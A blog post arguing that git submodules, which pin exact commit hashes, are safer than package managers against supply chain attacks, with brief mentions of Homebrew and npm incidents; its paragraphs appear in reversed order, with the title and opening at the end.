On the other hand, using git submodule forces you to refer to a specific git hash, and that can't be subverted. That's where the attack comes, you are trusting this package to be the one you mean. The local package manager fetches data from an external repository and gets the specified number or the latest matching the version pseudo regular expression. Package managers keep references to external packages through a textual version requirement number, usually in the form of a string like 2.3.4 or 2.*/ 2.+ (which are even worse from a security point of view because not even you are sure what you will get from the dependency!). ![]() Using git submodule doesn't offer any protection against malicious developers uploading libraries with hidden malicious behavior, but it can help to prevent the supplantation of an existing good package with a bad one ( unless you are capable of subverting git hashes, of course). ![]() Recently Homebrew, the so called missing package manager for macOs, suffered a supply chain attack, where people blindly trusting and downloading Homebrew packages could have gotten extra unwanted code. In the case of the npm ecosystem, malicious actors have sometimes gained access to the accounts of certain developers and uploaded malicious versions of their packages. However, this user friendliness towards developers and users is starting to catch developers unguarded of malicious intent. Rather than asking users to install dependencies one by one into their system, package managers typically allow downloading source or binary dependencies into the project, usually without requiring a system install, allowing users to build the project without administrator rights on a system (quite useful for build servers, own or rented). Package managers have thus exploded in circles where software distribution is preferably done in source code form, requiring end users to build the source or run it (in the case of interpreted languages). Package managers are more user friendly than git submodule, and the requirements to get started using one tend to be reduced to writing a simple text file and running one or at most two commands to download all the dependencies. As such, many developers are exposed to git, but not many know about submodules, a command which allows you to keep track of external sources in a secure and deterministic way. ![]() Today, software development uses some form of source content management, and it seems like git has won the war, especially since it is used by GitHub, possibly the most popular free repository choice for open source and free software. On the other hand, people mostly coming from interpreted languages are so used to the idea that not using a package manager seems like crazy advice. Why would you want to use one? It is actually not weird to have that point of view, especially if your background comes from programming languages like C or C++, which don't have any well known package manager ( even though people keep trying to build some) and developers resort to using the system libraries/packages or git submodules to manage their software builds. Package managers have always looked strange to me. Rants from the Ballmer Peak Package managers, the lazy alternative to git submodules The problem
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |